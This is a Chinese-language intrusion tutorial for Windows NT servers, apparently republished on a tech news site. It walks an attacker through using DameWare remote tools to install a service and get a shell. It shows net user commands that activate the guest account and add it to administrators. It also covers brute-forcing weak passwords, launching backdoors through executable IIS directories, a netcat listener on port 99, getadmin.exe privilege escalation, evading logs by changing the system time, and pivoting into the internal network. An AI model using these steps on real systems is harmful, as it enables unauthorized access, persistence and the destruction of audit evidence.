扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
如果你已经夺取了一定的权限,比如,可写的!
那么运用下面两个软件,可以轻易的帮你入侵:
DNTUCli.exe
DNTUS26.exe
在命令提示下运行:
D:\>DNTUCli.exe
Usage: DNTUCli.exe <\\server>
DNTUCli.exe \\MachineName (remote server is \\MachineName)
DNTUCli.exe \\. (local server)
Copyright (C) 1991-2001 DameWare Development
www.dameware.com
当你输入ip的时候会让你输入用户和密码!
只要对方开了rpc而且你的用户有可写的权限的话!!
就会复制同一目录下的DNTUS26.exe,这种程序是自己安装而且自己打开服务的!
然后你就可以直接连接到对方的c了!
这种软件有CMD重定向功能···
然后你就随便想做你的任何事情了!
C:\>net user
\\FYNET33 的用户帐户
----------------------------------
Administrator Guest
命令成功完成。
C:\>net user guest /active:yes
命令成功完成。
C:\>net user guest wry
命令成功完成。
C:\>net user localgroup administrators guest /add
命令成功完成。
这个时候你的guest已经是管理员了!!如果你禁止了net.exe或者被删除了你可以用
ftp命令下一个net.exe或者另外一个软件adduser.exe
用法:
D:\>addusers.exe
ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [\\computername|domainname] [/p
:{l|c|e|d}]
Error: too few arguments
现在你就是管理员了!要是感觉还不是很爽!呵呵!那么努力进它的内部网络吧!!
看:
一,进入第一台假设平台的nt服务器
通过简单的扫描器,只需带有简单密码验证的哪些就已足够扫出那些防范教差的机器。
通常的用户名不是空就是相同。
绑定netbeui协议的nt平台有个致命的弱点允许攻击者得到本地用户名列表
及采用暴力法不断验证他们的密码 。
然后,就是因为网管在意识上的不重视,攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的
或密码为空的服务器。
二,攻击者控制服务器文件系统
有了密码对入侵者来说,绝对不是他们的最终目的!
隐射为本地盘,当入侵者得到你adminitrator组的任何一个成员的密码,或者是个普通用户的密码
这里我把具体命令cut了!
1,是administrator的成员时几乎可以隐射你任意一个盘。
2,普通用户将利用各种可能的机会得到更多的信息或直接利用web hole来获取更大的权限。
典型的手法有:利用web asp的功能!控制你整个硬盘 (注意iis的一些已知的漏洞 upload.asp)。
注意:利用asp 功能,攻击者同样能控制你硬盘上的大多数的文件(everyone的文件)
三,起动任何他们想要立即运行的程序
一般来说立即启动对nt来说是比较困难的,虽然有些入侵者会写几句命令,然后等待服务器重新
启动时,他的程序也将得以运行,但是我想对于大多数的攻击者来说,他们不会有那么好的耐心
他们会立即启动他们的东西(可能是些后门木马)。
在nt iis的web配置里有个选项是执行--------危险
攻击者将利用他控制你文件系统的任何一种方法把他要启动的程序放到那些允许执行的目录里去
然后他们将 http://www.xxx.com/cgi-bin/xxx.exe 利用web 启动该文件。
指出:iis 默认的一些目录带有可执行的权利 /script/tools/ ....
对于一些初级入侵者来说,他们往往启动的是些后门木马,然后对于那些经验丰富的入侵者
他可能对控制你一台机器已经显得毫无兴趣,他们可能真正的目的是控制你的整个网段。
这里值得注意的是,这些入侵者将会启动一个 等同于telnet shell for nt的东西
netcat ncx99.exe将在nt的99段口开启一个telnet服务端进程,等代攻击者的登陆
四,登陆取得最高权限
登陆后的入侵者在远端服务器并不具有最高的权限,他们将采用一些nt本地溢出变成admin
其中著名的程序是getadmin.exe
五,删除日志记录
任何一个入侵者都懂得保护他们自己!所以删除日志记录对他们来说是件很重要的事在这里
我建议网管采用第二硬备份或采用第三方日志记录系统。
由于nt的日志文件是当前进程运行操作的文件,他是根据时间来不断换新的操作文件的
任何人包括admin在内是无权删除或更改的。
而这里有个简单的不能在简单的原理,入侵者在取得admin权限后通过更改系统时间!让日志
记录进程转而记录另一个文件,然后更改他想更改的那个日志文件。
六,进入你的内部网
由于攻击者登陆你的 shell ,此时的他所具有的ip 等同于你这台机器上的内部地址
ftp 198.162.1.2
telnet 127.0.0.3
net view
net use * \\
都将在他们的手里变成入侵你内部网的工具,通过影射,然后在 cd z:
同时上述的攻击手段将再一次在内部网重演,扫描,破解,登陆。内部网络的速度将比远程
快很多,这无意给入侵者暴力破解打开了方便之门。
七,更多手段
可能话!他们会做一切你想不到的事!监听,ip欺骗。。。。。
但是,嗅探的方法是不可能在交换机的网络里抓到信息的!即使在内部网络里,我们的
目标就是拿到对方的密码才可以有访问的权限!
如果你侥幸的有权限加到了域管理员!那么以上的都不要了!
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者